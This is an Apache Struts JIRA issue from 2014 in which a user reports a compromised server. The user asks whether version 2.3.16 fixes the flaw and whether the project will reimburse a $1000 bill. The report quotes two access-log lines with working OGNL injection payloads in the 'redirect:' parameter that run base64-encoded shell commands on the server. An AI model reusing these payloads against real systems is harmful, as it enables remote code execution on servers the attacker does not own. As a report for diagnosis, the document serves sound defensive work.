You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "RAJA SEKHAR (JIRA)" <ji...@apache.org> on 2014/03/19 15:01:04 UTC

[jira] [Created] (WW-4304) Security issues with sturts 2.3.x

RAJA SEKHAR created WW-4304:
-------------------------------

             Summary: Security issues with sturts 2.3.x
                 Key: WW-4304
                 URL: https://issues.apache.org/jira/browse/WW-4304
             Project: Struts 2
          Issue Type: Bug
          Components: Core Actions
    Affects Versions: 2.3.12
         Environment: Ubuntu on microsoft windows azure
            Reporter: RAJA SEKHAR
             Fix For: 2.3.12


Hi 
I have analyzed the logs for SMA and i found out the following in log files
202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("d2hvYW1p")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[1],%23len%3D%23d.read%28%23e%29,%20%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D HTTP/1.1" 200 15
202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("dW5hbWUgLWE%3D")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[100],%23len%3D%23d.read%28%23e%29,%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D HTTP/1.1" 200 115
I have seen these entries in log file. Through this intruder has hacked the system by finding the issue name /passwords etc and he has taken control of the system.
By this he created files in ROOT directory , and he was running DOS attacks on the system. This led to large data transfer and there was a bill of 1000$ was generated to our customer. I found that the issue is fixed in version 2.3.16. 
I have following questions 
1) are these issues are fixed in 2.3.16.
2) Since the root cause of the problem is with struts -2.3.1.1 , do you reimburse the bill.

Please help us resolving this use




--
This message was sent by Atlassian JIRA
(v6.2#6252)